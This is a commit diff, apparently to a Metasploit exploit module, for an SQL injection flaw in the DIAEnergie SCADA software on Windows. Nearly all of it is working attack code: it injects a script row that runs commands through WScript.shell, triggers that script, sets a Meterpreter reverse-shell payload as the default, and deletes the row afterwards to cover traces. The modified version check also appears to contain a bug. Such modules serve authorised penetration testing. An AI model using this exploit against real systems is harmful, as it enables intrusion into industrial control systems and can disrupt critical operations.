Minor fixes

h4x-x0r · h4x-x0r · commit 35cbf63890ad · 2024-08-02T16:58:24.000+01:00
Specified a default payload
Randomized date and time
Wrapped cleanup in an ensure block
diff --git a/modules/exploits/windows/scada/diaenergie_sqli.rb b/modules/exploits/windows/scada/diaenergie_sqli.rb
@@ -30,7 +30,10 @@ def initialize(info = {})
             {
               'Arch' => [ ARCH_CMD ],
               'Platform' => 'win',
-              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'DefaultOptions' => {
+                'FETCH_COMMAND' => 'CURL',
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
+              },
               'Type' => :win_fetch
             }
           ]
@@ -69,10 +72,8 @@ def check
     version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/
     version = res.match(version_pattern)
 
-    if version
-      version[0]
-    else
-      return Exploit::CheckCode::Detected
+    if version[0].nil?
+      Exploit::CheckCode::Detected
     end
 
     vprint_status('Version retrieved: ' + version[0])
@@ -92,43 +93,57 @@ def execute_command(cmd)
     scname = Rex::Text.rand_text_alphanumeric(5..10).to_s
     vprint_status('Using random script name: ' + scname)
 
+    year = rand(2024..2026)
+    month = sprintf('%02d', rand(1..12))
+    day = sprintf('%02d', rand(1..29))
+    random_date = "#{year}-#{month}-#{day}"
+    vprint_status('Using random date: ' + random_date)
+
+    hour = sprintf('%02d', rand(0..23))
+    minute = sprintf('%02d', rand(0..59))
+    second = sprintf('%02d', rand(0..59))
+    random_time = "#{hour}:#{minute}:#{second}"
+    vprint_status('Using random time: ' + random_time)
+
     # Inject payload
-    print_status('Sending SQL injection...')
-    connect
-    sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"
-    res = sock.get
-    if res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
-      vprint_status('Injection - Expected response received: ' + res.to_s)
-    else
-      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
-    end
-    disconnect
+    begin
+      print_status('Sending SQL injection...')
+      connect
+      vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")
+      sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"
+      res = sock.get
+      if res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
+        vprint_status('Injection - Expected response received: ' + res.to_s)
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      end
+      disconnect
 
-    # Trigger
-    print_status('Triggering script execution...')
-    connect
-    sock.put 'RecalculateScript~2024-02-04 00:00:00~2024-02-05 00:00:00~1'
-    res = sock.get
-    if res.to_s == 'Recalculate Script Start!'
-      vprint_status('Trigger - Expected response received: ' + res.to_s)
-    else
-      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
-    end
-    disconnect
+      # Trigger
+      print_status('Triggering script execution...')
+      connect
+      sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"
+      res = sock.get
+      if res.to_s == 'Recalculate Script Start!'
+        vprint_status('Trigger - Expected response received: ' + res.to_s)
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      end
+      disconnect
 
-    # Cleanup
-    print_status('Cleaning up database...')
-    connect
-    sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"
-    res = sock.get
-    if res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
-      vprint_status('Cleanup - Expected response received: ' + res.to_s)
-    else
-      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      print_good('Script successfully injected, check thy shell.')
+    ensure
+      # Cleanup
+      print_status('Cleaning up database...')
+      connect
+      sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"
+      res = sock.get
+      if res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'
+        vprint_status('Cleanup - Expected response received: ' + res.to_s)
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)
+      end
+      disconnect
     end
-    disconnect
-
-    print_good('Script successfully injected, check thy shell.')
   end
-
 end
